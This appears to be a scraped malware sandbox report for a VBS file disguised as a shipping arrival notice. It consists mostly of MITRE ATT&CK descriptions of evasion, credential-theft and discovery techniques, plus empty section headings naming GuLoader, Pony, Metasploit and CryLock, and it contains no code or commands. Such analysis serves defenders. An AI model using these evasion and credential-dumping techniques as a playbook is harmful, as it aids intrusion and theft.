Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Threatname: Pony

Threatname: Metasploit

Threatname: CryLock

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Location Tracking:

Cryptography:

Exploits:

Privilege Escalation:

Bitcoin Miner:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre